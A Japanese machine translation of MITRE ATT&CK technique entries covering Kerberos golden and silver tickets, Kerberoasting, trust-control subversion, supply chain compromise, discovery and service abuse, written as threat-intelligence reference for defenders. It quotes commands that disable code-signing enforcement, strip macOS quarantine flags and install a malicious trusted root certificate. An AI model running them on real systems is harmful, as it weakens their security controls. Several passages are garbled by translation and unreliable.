クラックされたハッシュは、[Valid Accounts](https://attack.mitre.org/techniques/T1078)へのアクセスを介して、[Persistence](https://attack.mitre.org/tactics/TA0003)、[Privilege Escalation](https://attack.mitre.org/tactics/TA0004)、[Lateral Movement](https://attack.mitre.org/tactics/TA0008)を可能にするかもしれない。(引用:SANS Attacking Kerberos Nov 2014)
480
T1558.001 Kerberosのチケットを盗む、または偽造する。ゴールデンチケット KRBTGTアカウントのパスワードハッシュを持っている敵対者は、ゴールデンチケットとしても知られるKerberosチケット付与チケット(TGT)を偽造することができます。(引用:AdSecurity Kerberos GT Aug 2015) ゴールデンチケットを使用すると、敵対者はActive Directory内のあらゆるアカウントの認証材料を生成することができます。(引用:CERT-EU Golden Ticket Protection)

ゴールデンチケットを使用すると、敵対者は特定のリソースへのアクセスを可能にするチケット付与サービス(TGS)チケットを要求することができます。ゴールデンチケットは、TGSを取得するために、敵対者がKey Distribution Center (KDC)と対話する必要があります。(引用:ADSecurity Detecting Forged Tickets)

KDCサービスは、Active Directoryドメインの一部であるドメインコントローラ上ですべて実行されています。KRBTGTは、Kerberos Key Distribution Center (KDC)サービスのアカウントであり、すべてのKerberosチケットの暗号化と署名を担当する。(引用:ADSecurity Kerberos and KRBTGT) KRBTGTのパスワード・ハッシュは、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)とドメイン・コントローラへの特権的なアクセスを使用して入手することができる。
481
T1558.003 Kerberosのチケットを盗む、または偽造する。ケルベロスティング 敵対者は、有効なKerberosチケット付与チケット(TGT)を悪用したり、ネットワークトラフィックをスニフしたりして、[Brute Force](https://attack.mitre.org/techniques/T1110)に脆弱なチケット付与サービス(TGS)チケットを取得することがあります。(引用:Empire InvokeKerberoast 2016年10月)(引用:AdSecurity Cracking Kerberos 2015年12月)

サービスプリンシパル名(SPN)は、Windowsサービスの各インスタンスを一意に識別するために使用されます。認証を可能にするために、KerberosはSPNが少なくとも1つのサービスログオンアカウント(サービスを実行するために特別にタスクを与えられたアカウント(引用:Microsoft Detecting Kerberoasting Feb 2018))と関連付けられることを必要とします。(引用:Microsoft SPN)(引用:Microsoft SetSPN)(引用:SANS Attacking Kerberos Nov 2014)(引用:Harmj0y Kerberoast Nov 2016)

有効なKerberosチケット付与チケット(TGT)を所持する敵対者は、ドメインコントローラ(DC)から任意のSPNに対する1つ以上のKerberosチケット付与サービス(TGS)サービスチケットを要求することができる。(引用:Empire InvokeKerberoast 2016年10月)(引用:AdSecurity Cracking Kerberos 2015年12月) これらのチケットの一部はRC4アルゴリズムで暗号化されている可能性があり、SPNに関連付けられたサービスアカウントのKerberos 5 TGS-REP etype 23ハッシュが秘密鍵として使用されていることを意味し、したがってオフラインの[Brute Force]に対して脆弱です(https://attack.mitre.org/techniques/T1110)攻撃によって平文の認証情報が暴露される可能性があります。(引用:AdSecurity Cracking Kerberos Dec 2015)(引用:Empire InvokeKerberoast Oct 2016)(引用:Harmj0y Kerberoast Nov 2016)

この同じ攻撃は、ネットワークトラフィックからキャプチャしたサービスチケットを使用して実行できます。(引用:AdSecurity Cracking Kerberos Dec 2015)

クラックされたハッシュは、[Valid Accounts](https://attack.mitre.org/techniques/T1078)へのアクセスを介して、[Persistence](https://attack.mitre.org/tactics/TA0003)、[Privilege Escalation](https://attack.mitre.org/tactics/TA0004)、[Lateral Movement](https://attack.mitre.org/tactics/TA0008)を可能にする可能性があります。(引用:SANS Attacking Kerberos Nov 2014)
482
T1558.002 Kerberosのチケットを盗む、または偽造する。シルバーチケット 対象となるサービス・アカウント(例:SharePoint、MSSQL)のパスワード・ハッシュを持っている敵対者は、シルバー・チケットとしても知られているKerberosチケット・グラント・サービス(TGS)チケットを偽造することができる。KerberosのTGSチケットは、サービスチケットとしても知られています。(引用:ADSecurity シルバーチケット)

シルバーチケットは、敵が特定のリソース(例えば、MSSQL)とそのリソースをホストするシステムにアクセスすることだけを可能にするという点で、ゴールデンチケットよりも範囲が限定されています。しかし、ゴールデンチケットとは異なり、シルバーチケットを偽造する能力を持つ敵は、キー・ディストリビューション・センター(KDC)と対話することなくTGSチケットを作成することができ、潜在的に検出をより困難にしています。(引用:ADSecurity Detecting Forged Tickets)

対象サービスのパスワードハッシュは、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)や[Kerberoasting](https://attack.mitre.org/techniques/T1558/003)を使って入手することができます。
483
T1553 トラストコントロールの破壊 敵対者は、信頼できない活動についてユーザに警告したり、信頼できないプログラムの実行を防止したりするセキュリティ制御を弱体化させる可能性があります。オペレーティングシステムやセキュリティ製品には、プログラムやWebサイトがある程度の信頼性を持っていることを識別する仕組みが含まれている場合があります。このような機能の例としては、有効なコードサイニング証明書によって署名されているためにプログラムの実行が許可される、インターネットからダウンロードされたプログラムには属性が設定されているためにユーザーに警告が表示される、信頼されていないサイトに接続しようとしていることが示される、などがあります。

敵対者は、このような信頼メカニズムを破壊しようとするかもしれません。敵対者が使用する方法は、敵対者が破壊しようとする特定のメカニズムによって異なります。敵対者は、これらの制御を覆すことを支援するために、[File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222)または[Modify Registry](https://attack.mitre.org/techniques/T1112)を実施することがあります。(引用:SpectorOps Subverting Trust Sept 2017) また、敵対者は、標的システムの信頼を獲得するために、コード署名証明書を作成または盗用することがあります。(引用:Securelist Digital Certificates)(引用:Symantec Digital Certificates)
484
T1553.002 トラストコントロールを覆すコードサイニング 敵対者は、自分のマルウェアやツールに署名するために、コード署名用の素材を作成、入手、または盗用することがあります。コード・サイニングは、開発者のバイナリに対する信頼性と、バイナリが改ざんされていないことを保証するものである。(引用:Wikipedia Code Signing) 運用時に使用する証明書は、敵対者が作成、取得、または盗用する可能性があります。(引用:Securelist Digital Certificates) (引用:Symantec Digital Certificates) [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001)とは異なり、この活動では有効な署名が得られます。

初回実行時にソフトウェアを検証するコード署名は、最新のWindowsおよびmacOS/OS Xシステムで使用できます。Linuxでは、プラットフォームが分散化されているため、使用されていません。(引用:Wikipedia Code Signing)

コードサイニング証明書は、署名されたコードがシステム上で実行されることを必要とするセキュリティポリシーを迂回するために使用されることがあります。
485
T1553.006 トラストコントロールを覆すコードサイニングポリシーの変更 侵入者は、コード署名ポリシーを変更して、署名されていないコードや自己署名されたコードの実行を可能にすることがあります。コード署名は、開発者が作成したプログラムの信頼性と、そのプログラムが改ざんされていないことを保証するものです。セキュリティコントロールには、有効な署名されたコードのみをオペレーティングシステム上で実行できるようにする強制メカニズムを含めることができます。

これらのセキュリティコントロールの中には、WindowsのDriver Signature Enforcement(DSE)やmacOSのSystem Integrity Protection(SIP)のように、デフォルトで有効になっているものもあります。(引用:Microsoft DSE 2017年6月)(引用:Apple Disable SIP)その他のこのようなコントロールは、デフォルトでは無効になっていても、署名されたDynamic-Link Libraries(DLL)のみをシステム上で実行できるようにするなど、アプリケーションコントロールによって設定することができます。開発者がアプリケーションの開発やテスト中にデフォルトの署名実施ポリシーを変更することは有用であるため、昇格した権限でこれらの機能を無効にすることが可能な場合があります。(引用:Microsoft Unsigned Driver Apr 2017)(引用:Apple Disable SIP)

敵対者は、コマンドラインまたはGUIユーティリティの使用、[Modify Registry](https://attack.mitre.org/techniques/T1112)、デバッグ/リカバリーモードでのコンピュータの再起動、またはカーネルメモリ内の変数の値の変更など、さまざまな方法でコード署名ポリシーを変更することができます。(引用:Microsoft TESTSIGNING 2021年2月号)(引用:Apple Disable SIP)(引用:FireEye HIKIT Rootkit Part 2)(引用:GitHub Turla Driver Loader) システムのコード署名ポリシーを変更できるコマンドの例としては、<code>bcdedit.exe -set TESTSIGNING ON</code>(Windows)、<code>csrutil disable</code>(macOS)などがあります。(引用:Microsoft TESTSIGNING Feb 2021)(引用:Apple Disable SIP)実装によっては、署名ポリシーの変更に成功すると、侵害されたシステムの再起動が必要になる場合があります。また、実装によっては、ユーザーに目に見えるアーティファクトが発生する場合があります(例:画面の隅にシステムがテストモードであることを示す透かしが入る)。

カーネルメモリにアクセスして署名チェックに関連する変数を変更するために、例えば<code>g_CiOptions</code>を変更してDriver Signature Enforcementを無効にするなど、署名されているが脆弱なドライバを使って[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)を行うことがあります。(引用:Unit42 AcidBox June 2020)(引用:GitHub Turla Driver Loader)
486
T1553.001 トラストコントロールを覆すゲートキーパー・バイパス Adversaryは、Gatekeeperの制御を無効にするために、信頼できないソースからのプログラムであることを示すファイル属性を変更することがあります。macOSおよびOS Xでは、インターネットからアプリケーションやプログラムをダウンロードすると、ファイルに<code>com.apple.quarantine</code>という特殊な属性が設定されます。この属性は、実行時にアップル社の防御プログラムGatekeeperに読み取られ、ユーザーに実行を許可するか否かのプロンプトを提供します。

USBフラッシュドライブ、光ディスク、外付けハードドライブ、さらにはローカルネットワーク上で共有されたドライブからシステムに読み込まれたアプリは、このフラグを設定しません。また、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)を使うことで、このフラグの設定を回避することができます。これは、内蔵されているGatekeeperのチェックを完全に回避するものです。(引用:Macマルウェアの持続方法) 隔離フラグの有無は、xattrコマンドの<code>xattr /path/to/MyApp.app</code>で<code>com.apple.quarantine</code>を指定することで確認できます。同様に、sudoアクセスまたは昇格した権限があれば、この属性もxattrで削除することができます。<code>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</code>となります。(引用:Clearing quarantine attribute) (引用:OceanLotus for OS X)

通常の操作では、ファイルはインターネットからダウンロードされ、ディスクに保存される前に検疫フラグが設定されます。ユーザーがそのファイルやアプリケーションを開こうとすると、macOSのゲートキーパーが介入し、このフラグが存在するかどうかをチェックします。もしフラグが立っていれば、macOSはユーザーにプログラムを実行するかどうかの確認を促し、アプリケーションの出所となるURLも教えてくれます。ただし、これはすべて、検疫に精通したアプリケーションからファイルがダウンロードされたことが前提です。引用元:Bypassing Gatekeeper(ゲートキーパーの回避)
487
T1553.004 トラストコントロールを覆すルート証明書のインストール 敵対者は、敵対者が管理するWebサーバーに接続する際の警告を回避するために、感染したシステムにルート証明書をインストールすることがあります。ルート証明書は、公開鍵暗号方式において、ルート認証局(CA)を識別するために使用されます。ルート証明書がインストールされると、システムやアプリケーションは、ルート証明書によって署名されたルートの信頼の連鎖にある証明書を信頼するようになる。(引用:ウィキペディア ルート証明書)証明書は一般的に、ウェブブラウザ内で安全なTLS/SSL通信を確立するために使用されます。ユーザーが、信頼されていない証明書を提示しているウェブサイトを閲覧しようとすると、セキュリティ上のリスクを警告するエラーメッセージが表示されます。

侵害されたシステムにルート証明書をインストールすると、敵対者はそのシステムのセキュリティを低下させる手段となります。敵対者はこの技術を使って、感染したシステムが HTTPS で敵対者のコントロールするウェブ・サー バーに接続し、ログイン情報を収集するために正規のウェブサイトを偽装した場合に、ユーザーに表示されるセキュリ ティ警告を回避している。(引用:Operation Emmental)

非定型のルート証明書は、製造者やソフトウェアのサプライチェーンによってシステムにプレインストールされ、 マルウェア/アドウェアと組み合わせて使用され、安全な TLS/SSL 通信で送信される情報を傍受するための中間者機能を提供していた。(引用:Kaspersky Superfish)

ルート証明書(および関連するチェーン)は、クローンを作成して再インストールすることも可能です。クローン化された証明書チェーンは、ソースと同じメタデータの特徴を多く持ち、悪意のあるコードに署名するために使用することができます。このコードは、実行をブロックしたり、パーシステンスの成果物を発見したりするために使用される署名検証ツール(例:Sysinternals、アンチウイルスなど)を回避することができます。(引用:SpectorOps Code Signing Dec 2017)

macOSにおいて、マルウェア「Ay MaMi」は、<code>/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code>を使用して、悪意のある証明書を信頼できるルート証明書としてシステムキーチェーンにインストールします。(引用:オブジェクトシーアイマミ2018)
488
T1553.005 トラストコントロールの破壊マークオブザウェブ・バイパス 敵対者は、特定のファイル形式を悪用して、MOTW(Mark-of-the-Web)制御を回避することがあります。Windowsでは、インターネットからファイルをダウンロードすると、MOTWと呼ばれる特定の値を持つ<code>Zone.Identifier</code>という隠れたNTFSのADS(Alternate Data Stream)がタグ付けされます(引用:Microsoft Zone.Identifier 2020)。MOTWがタグ付けされたファイルは保護され、特定の動作ができなくなります。例えば、MS Office 10からは、MS OfficeのファイルにMOTWが付いていると、保護された表示で開きます。MOTWでタグ付けされた実行ファイルは、Windows Defender SmartScreenによって、よく知られた実行ファイルの許可リストとファイルを比較して処理されます。知られていない/信頼されていないファイルの場合、SmartScreenは実行を阻止し、ユーザーに実行しないよう警告します。(引用: Beek Use of VHD Dec 2020)(引用: Outflank MotW 2020)(引用: Intezer Russian APT Dec 2020)

敵対者は、圧縮/アーカイブ(.arj, .gzip)やディスクイメージ(.iso, .vhd)ファイル形式などのコンテナファイルを悪用して、MOTWでタグ付けされていない悪意のあるペイロードを配信する可能性があります。インターネットからダウンロードされたコンテナファイルにはMOTWのタグが付けられていますが、コンテナファイルを解凍したりマウントしたりしても、その中のファイルはMOTWを継承しない場合があります。MOTWはNTFSの機能であり、多くのコンテナファイルはNTFS代替データストリームをサポートしていません。コンテナファイルを展開・マウントした後は、その中に含まれるファイルがディスク上のローカルファイルとして扱われ、保護されずに実行される可能性があります。(引用:Beek Use of VHD Dec 2020)(引用:Outflank MotW 2020)
489
T1553.003 トラストコントロールの破壊SIPとトラストプロバイダーのハイジャック 敵対者は、SIPやトラストプロバイダのコンポーネントを改ざんして、署名検証チェックを行う際に、オペレーティングシステムやアプリケーションコントロールツールを誤認させる可能性があります。ユーザーモードでは、Windows Authenticode(引用:Microsoft Authenticode)デジタル署名がファイルの起源と完全性を検証するために使用され、署名されたコードの信頼を確立するために使用される可能性がある変数です(例:有効なMicrosoft署名を持つドライバは安全なものとして扱われる可能性があります)。署名の検証プロセスは、WinVerifyTrustアプリケーション・プログラミング・インターフェース(API)関数によって処理されます(引用:Microsoft WinVerifyTrust)。この関数は、問い合わせを受け付け、署名のパラメータを検証する責任のある適切なトラストプロバイダーと連携します。(引用:SpectorOps Subverting Trust Sept 2017)

実行ファイルの種類とそれに対応する署名フォーマットが異なるため、マイクロソフトは、API関数とファイルの間に抽象化の層を提供するために、Subject Interface Packages(SIP)(引用:EduardosBlog SIPs July 2008)と呼ばれるソフトウェアコンポーネントを作成しました。SIPは、API関数による署名の作成、取得、計算、検証を可能にする役割を担っています。ほとんどのファイル形式(Executable、PowerShell、Installerなど、カタログ署名はキャッチオールを提供する(引用:Microsoft Catalog Files and Signatures April 2017))に対して固有のSIPが存在し、グローバルにユニークな識別子(GUID)によって識別されます。(引用:SpectorOps Subverting Trust Sept 2017)

[Code Signing](https://attack.mitre.org/techniques/T1553/002)と同様に、敵対者はこのアーキテクチャを悪用して信頼制御を覆し、正当に署名されたコードのみをシステム上で実行できるようにするセキュリティポリシーを回避する可能性があります。敵対者は、SIPやトラストプロバイダのコンポーネントをハイジャックして、オペレーティングシステムやアプリケーション制御ツールを誤認させ、悪意のある(または任意の)コードを署名されたものとして分類させる可能性があります。(引用SpectorOps Subverting Trust Sept 2017)

* <code>Dll</code>と<code>FuncName</code>のレジストリ値を変更します。HKLMSOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}</code>は、署名されたファイルから暗号化されたデジタル証明書を取得するSIPのCryptSIPDllGetSignedDataMsg関数を提供するダイナミックリンクライブラリ(DLL)を指します。ファイルの実際の署名ではなく、既知の良好な署名値(例:Portable Executablesに対するMicrosoftの署名)を常に返すエクスポートされた関数を持つ悪意を持って作成されたDLLを指すことで、敵対者は、そのSIPを使用するすべてのファイルに許容可能な署名値を適用することができます(引用:GitHub SIP POC Sept 2017)(ただし、関数が返すハッシュがファイルから計算された値と一致しないため、ハッシュの不一致が発生し、署名が無効になる可能性が高いです)。
* <code>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}< のレジストリ値を変更します。CriptSIPDllVerifyIndirectData」は、SIPの「CriptSIPDllVerifyIndirectData」機能を提供するDLLを指すもので、ファイルの計算されたハッシュと署名されたハッシュ値を照合します。常にTRUE(検証が成功したことを示す)を返すエクスポートされた関数を持つ、悪意を持って作成されたDLLを指すことで、敵対者は、そのSIPを使用して(正当な署名を持つ)あらゆるファイルの検証を成功させることができます(引用:GitHub SIP POC Sept 2017)(前述のCryptSIPDllGetSignedDataMsg関数をハイジャックしてもしなくても)。このレジストリ値は、すでに存在するDLLから適切なエクスポートされた関数にリダイレクトすることもでき、ディスク上に新しいファイルをドロップして実行する必要はありません。
* <code>HKLM#SOFTWARE#[WOW6432Node\]Microsoft#Cryptography#Providers#Trust#FinalPolicy#{trust provider GUID}<</code>の<code>DLL</code>と<code>Function</code>のレジストリ値を修正します。トラストプロバイダのFinalPolicy関数を提供するDLLを指すコードで、この関数では、復号され、解析された署名がチェックされ、信頼性の判断が行われます。SIPのCriptSIPDllVerifyIndirectData関数をハイジャックするのと同様に、この値は、既に存在するDLLや悪意を持って作成されたDLLから適切にエクスポートされた関数にリダイレクトすることができます(ただし、トラストプロバイダーの実装は複雑です)。
* **注意:** 上記のハイジャックは、[DLL Search Order Hijacking](https://attack.

SIPやトラストプロバイダのコンポーネントをハイジャックすると、コード署名や署名検証を行うあらゆるアプリケーションからこれらの悪意のあるコンポーネントが呼び出される可能性があるため、持続的なコード実行も可能になります。(引用:SpectorOps Subverting Trust 2017年9月)
490
T1195 サプライチェーン・コンプロマイズ 敵対者は、データやシステムの侵害を目的として、最終消費者が製品を受け取る前に、製品や製品配送の仕組みを操作することがあります。

サプライチェーンの危殆化は、以下のようなサプライチェーンのどの段階でも起こり得ます。

* 開発ツールの操作
* 開発環境の操作
* ソースコードリポジトリ(パブリックまたはプライベート)の操作
* オープンソースの依存関係にあるソースコードの操作
* ソフトウェアの更新/配布メカニズムの操作
* 危殆化/感染したシステムイメージ(工場で感染したリムーバブルメディアの複数のケース)(引用:IBM Storwize)(引用:Schneider Electric USB Malware) * 正規のシステムイメージの置き換え(引用:Schneider Electric USB Malware)。IBM Storwize) (引用:Schneider Electric USB Malware)
* 正規のソフトウェアを改変したバージョンに置き換える
* 改変された/偽造された製品を正規の販売業者に販売する
* 出荷を妨害する

サプライチェーンの侵害は、ハードウェアやソフトウェアのあらゆるコンポーネントに影響を与える可能性がありますが、実行力を身につけようとする攻撃者は、ソフトウェアの配布や更新チャネルで正規のソフトウェアに悪意のある追加を行うことにしばしば焦点を当ててきました。(引用:Avast CCleaner3 2018) (引用:Microsoft Dofoil 2018) (引用:Command Five SK 2011) ターゲットは、希望する被害者セットに特定される場合もあれば(引用:Symantec Elderwood Sept 2012)、悪意のあるソフトウェアを広範囲の消費者に配布しても、特定の被害者に対する追加の戦術にのみ移行する場合もあります。(引用:Avast CCleaner3 2018) (引用:Command Five SK 2011) 多くのアプリケーションで依存関係として使用されている人気のオープンソースプロジェクトも、依存関係のユーザーに悪意のあるコードを追加する手段として狙われることがあります。(引用:Trendmicro NPM Compromise)
491
T1195.003 Supply Chain Compromise:妥協したハードウェアのサプライチェーン 敵対者は、最終消費者が製品を受け取る前に、データやシステムの侵害を目的として製品のハードウェアコンポーネントを操作することがあります。敵対者は、サプライチェーン上でハードウェアやファームウェアを変更することにより、消費者ネットワークにバックドアを挿入することができます。このバックドアは、検出が困難な場合もありますが、敵対者はシステムを高度に制御することができます。ハードウェア・バックドアは、サーバ、ワークステーション、ネットワーク・インフラ、周辺機器など、さまざまな機器に挿入される可能性があります。 492
T1195.001 サプライチェーン・コンプロマイズ:ソフトウェアの依存性と開発ツールのコンプロマイズ 敵対者は、データやシステムを侵害する目的で、最終消費者が受け取る前に、ソフトウェアの依存関係や開発ツールを操作することがあります。アプリケーションは、正常に機能するために外部のソフトウェアに依存していることがよくあります。多くのアプリケーションで依存関係として使用されている人気の高いオープンソースプロジェクトは、依存関係にあるユーザーに悪意のあるコードを追加する手段として狙われる可能性があります。(引用:Tlendmicro NPM Compromise)

標的は、希望する被害者集団に特定されることもあれば、広範な消費者集団に配布された後、特定の被害者に対してのみ追加の戦術に移ることもあります。
493
T1195.002 Supply Chain Compromise:妥協したソフトウェアのサプライチェーン 侵入者は、データやシステムの侵害を目的として、最終消費者が受け取る前のアプリケーションソフトウェアを操作することがあります。ソフトウェアのサプライチェーンの侵害は、アプリケーションのソースコードの操作、そのソフトウェアの更新/配布メカニズムの操作、コンパイル済みのリリースを修正版に置き換えることなど、さまざまな方法で行われます。

ターゲティングは、希望する被害者セットに特定して行われることもあれば、広範な消費者に配布されても、特定の被害者に対する追加の戦術にのみ移行することもあります。(引用:Avast CCleaner3 2018)(引用:Command Five SK 2011)
494
T1082 システム情報の発見 敵対者は、バージョン、パッチ、ホットフィックス、サービスパック、アーキテクチャなど、オペレーティング システムやハードウェアに関する詳細な情報を取得しようとする場合があります。敵対者は、自動検出中に[System Information Discovery](https://attack.mitre.org/techniques/T1082)から得た情報を利用して、敵対者がターゲットを完全に感染させるかどうかや、特定のアクションを試みるかどうかなど、その後の行動を形成することがあります。

[Systeminfo](https://attack.mitre.org/software/S0096)などのツールを使用して、詳細なシステム情報を収集することができます。システムデータの内訳は、macOSの<code>systemsetup</code>コマンドでも収集できますが、管理者権限が必要です。

AWS、GCP、AzureなどのIaaS(Infrastructure as a Service)クラウドプロバイダーでは、APIを介してインスタンスや仮想マシンの情報にアクセスできます。認証されたAPIコールに成功すると、特定のインスタンスのOSプラットフォームやステータス、仮想マシンのモデルビューなどのデータを返すことができます。(引用:Amazon Describe Instance)(引用:Google Instances Resource)(引用:Microsoft Virutal Machine API
495
T1614 システム位置検出
敵対者は、被害者ホストの地理的な位置を計算しようとして情報を収集することがあります。敵対者は、自動検出中に[System Location Discovery](https://attack.mitre.org/techniques/T1614)から得た情報を利用して、敵対者がターゲットを完全に感染させるかどうかや、特定のアクションを試みるかどうかなど、その後の行動を形成することがあります。

敵対者は、タイムゾーン、キーボードレイアウト、および/または言語設定などのさまざまなシステムチェックを使用して、システムのロケーションを推測しようとする可能性があります(引用: FBI Ragnar Locker 2020)(引用: Sophos Geolocation 2016)(引用: Bleepingcomputer RAT malware 2020)ホストのロケールを決定するために、<code>GetLocaleInfoW</code>などのWindows API関数を使用することもできます。(引用:FBI Ragnar Locker 2020) クラウド環境では、インスタンスのアベイラビリティゾーンは、インスタンスからインスタンスメタデータサービスにアクセスすることでも判明する場合があります。(引用:AWS Instance Identity Documents)(引用:Microsoft Azure Instance Metadata 2021)

敵対者は、オンラインのジオロケーションIPルックアップサービスを経由するなど、IPアドレスを使用して被害者ホストの位置を推測しようとする場合もあります。(引用:Securelist Trasparent Tribe 2020)(引用:Sophos Geolocation 2016)
496
T1016 システム ネットワーク構成の発見 敵対者は、アクセスしたシステムのネットワーク構成や設定の詳細を探したり、リモートシステムの情報を発見したりすることがあります。このような情報を収集するために、いくつかのオペレーティング・システム管理ユーティリティが存在します。例えば、[Arp](https://attack.mitre.org/software/S0099)、[ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101)、[nbtstat](https://attack.mitre.org/software/S0102)、[route](https://attack.mitre.org/software/S0103)などが挙げられます。

敵対者は、自動検出の際に[System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016)から得た情報を利用して、敵対者がターゲットを完全に感染させるかどうかや、特定のアクションを試みるかどうかなど、その後の行動を形成することがあります。
497
T1016.001 システムのネットワーク構成の発見。インターネット接続の発見 侵入者は、侵入したシステムのインターネット接続性を確認することがあります。これは、自動検出の際に実行され、[Ping](https://attack.mitre.org/software/S0097)、<code>tracert</code>、WebサイトへのGETリクエストなど、さまざまな方法で行うことができます。

敵対者は、これらのリクエストの結果と応答を使用して、システムがC2サーバへの接続を試みる前に、そのシステムがC2サーバと通信できるかどうかを判断することがあります。また、これらの結果は、ルート、リダイレクタ、およびプロキシ サーバを特定するために使用されることもあります。
498
T1049 システム ネットワーク接続 ディスカバリー

クラウド環境の一部であるシステムにアクセスした敵対者は、どのようなシステムやサービスが接続されているかを確認するために、仮想プライベートクラウドや仮想ネットワークをマッピングすることがあります。実行されるアクションは、オペレーティングシステムによっては同じ種類の発見技術である可能性がありますが、結果として得られる情報には、敵対者の目的に関連するネットワーク化されたクラウド環境の詳細が含まれる場合があります。クラウドプロバイダーによっては、仮想ネットワークの運用方法が異なる場合があります。(引用:Amazon AWS VPC Guide)(引用:Microsoft Azure Virtual Network Overview)(引用:Google VPC Overview)

これらの情報を取得するユーティリティーやコマンドには、[netstat](https://attack.mitre.org/software/S0104)、[net](https://attack.mitre.org/software/S0039)による「net use」や「net session」などがあります。MacやLinuxでは、[netstat](https://attack.mitre.org/software/S0104)や<code>lsof</code>で現在の接続を一覧できます。 <code>who -a</code>や<code>w</code>では、"net session "と同様に、現在ログインしているユーザを表示できます。
499
T1033 システムオーナー/ユーザーの発見 敵対者は、プライマリ・ユーザ、現在ログインしているユーザ、システムを一般的に使用しているユーザ群、またはユーザがシステムを積極的に使用しているかどうかを特定しようとすることがあります。例えば、アカウントのユーザ名を取得したり、[OS クレデンシャルダンピング](https://attack.mitre.org/techniques/T1003)を使用したりして、これを行う可能性があります。また、ユーザとユーザ名の詳細はシステム全体に広く浸透しており、実行中のプロセスの所有権、ファイル/ディレクトリの所有権、セッション情報、システムログなどが含まれるため、他の発見技術を用いて様々な方法で情報を収集することができます。敵対者は、自動検出の際に [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) から得た情報を使用して、敵対者がターゲットを完全に感染させるかどうかや、特定のアクションを試みるかどうかなど、その後の行動を形成することがあります。

この情報を取得するユーティリティやコマンドには、<code>whoami</code>などがあります。MacやLinuxでは、<code>w</code>や<code>who</code>で現在ログインしているユーザーを特定することができます。
500
T1007 システムサービスディスカバリー 敵対者は、登録されたサービスに関する情報を取得しようとする場合があります。オペレーティングシステムのユーティリティを使用してサービスに関する情報を取得するコマンドとしては、「sc」、[Tasklist](https://attack.mitre.org/software/S0057)を使用した「tasklist /svc」、[Net](https://attack.mitre.org/software/S0039)を使用した「net start」などがありますが、敵対者は他のツールを使用することもあります。敵対者は、自動検出時に[System Service Discovery](https://attack.mitre.org/techniques/T1007)から得られる情報を利用して、敵対者がターゲットを完全に感染させるかどうかや、特定のアクションを試みるかどうかなど、その後の行動を形成することがあります。 501
T1569 システムサービス 敵対者は、システムサービスやデーモンを悪用して、コマンドやプログラムを実行することがあります。敵対者は、サービスと対話したり、サービスを作成したりすることで、悪意のあるコンテンツを実行することができます。多くのサービスは起動時に実行されるように設定されており、これは永続性の実現に役立ちますが([Create or Modify System Process](https://attack.mitre.org/techniques/T1543))、敵対者は1回限りの実行や一時的な実行のためにサービスを悪用することもできます。 502
T1569.001 システムサービスのLaunchctl 敵対者はlaunchctlを悪用してコマンドやプログラムを実行することがあります。Launchctlは、macOSのlaunchdプロセスを制御します。launchdプロセスは、[Launch Agent](https://attack.mitre.org/techniques/T1543/001)や[Launch Daemon](https://attack.mitre.org/techniques/T1543/004)などを処理しますが、他のコマンドやプログラムを自ら実行することもできます。Launchctlは、コマンドラインでサブコマンドを受け取ることや、対話的にサブコマンドを受け取ること、さらには標準入力からリダイレクトされることをサポートしています。(引用:Launchctl Man)

[Launch Agent](https://attack.mitre.org/techniques/T1543/001)sや[Launch Daemon](https://attack.mitre.)をロードしたりリロードしたりすることで、macOSのプロセスを制御します。org/techniques/T1543/004)をロードしたりリロードしたりすることで、パーシステンスをインストールしたり、自分が行った変更を実行したりすることができます。(引用:Sofacy Komplex Trojan)

launchctlからコマンドを実行するのは、<code>launchctl submit -l <labelName> -- /Path/to/thing/to/execute "arg" "arg"</code>のように簡単です。敵対者はこの機能を悪用してコードを実行したり、launchctlが許可されたプロセスであればアプリケーション制御をバイパスすることもできます。
503
T1569.002 システムサービス。サービスの実行 敵対者は、Windowsサービスコントロールマネージャーを悪用して、悪意のあるコマンドやペイロードを実行する可能性があります。Windowsのサービスコントロールマネージャー(<code>services.exe</code>)は、サービスを管理・操作するためのインターフェイスです(引用:Microsoft Service Control Manager)サービスコントロールマネージャーは、GUIコンポーネントのほか、<code>sc.exe</code>や[Net](https://attack.mitre. org/software/S0039)などのシステムユーティリティを介してユーザーがアクセスできます。org/software/S0039)。

[PsExec](https://attack.mitre.org/software/S0029)は、サービスコントロールマネージャーAPIを介して作成された一時的なWindowsサービスを介して、コマンドやペイロードを実行するためにも使用できます。(引用:Russinovich Sysinternals)

敵対者は、これらのメカニズムを利用して、悪意のあるコンテンツを実行する可能性があります。これは、新しいサービスを実行するか、変更されたサービスを実行するかのいずれかによって行われます。この手法は、サービスの永続化や特権昇格の際に[Windowsサービス](https://attack.mitre.org/techniques/T1543/003)と組み合わせて使用される実行です。
504
T1529 システムのシャットダウン/再起動 敵対者は、システムへのアクセスを妨害したり、システムの破壊を助けたりするために、システムをシャットダウン/再起動することがあります。オペレーティングシステムには、マシンのシャットダウン/再起動を開始するコマンドが含まれている場合があります。場合によっては、これらのコマンドがリモートコンピュータのシャットダウン/再起動を開始するために使用されることもあります。(引用:Microsoft Shutdown Oct 2017) システムのシャットダウンや再起動は、正当なユーザーのコンピュータリソースへのアクセスを妨害する可能性があります。

敵対者は、[Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002)や[Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)などの他の方法でシステムに影響を与えた後に、システムの可用性に対する意図した効果を早めるために、システムのシャットダウン/再起動を試みることがあります。(引用:Talos Nyetya 2017年6月)(引用:Talos Olympic Destroyer 2018)
505
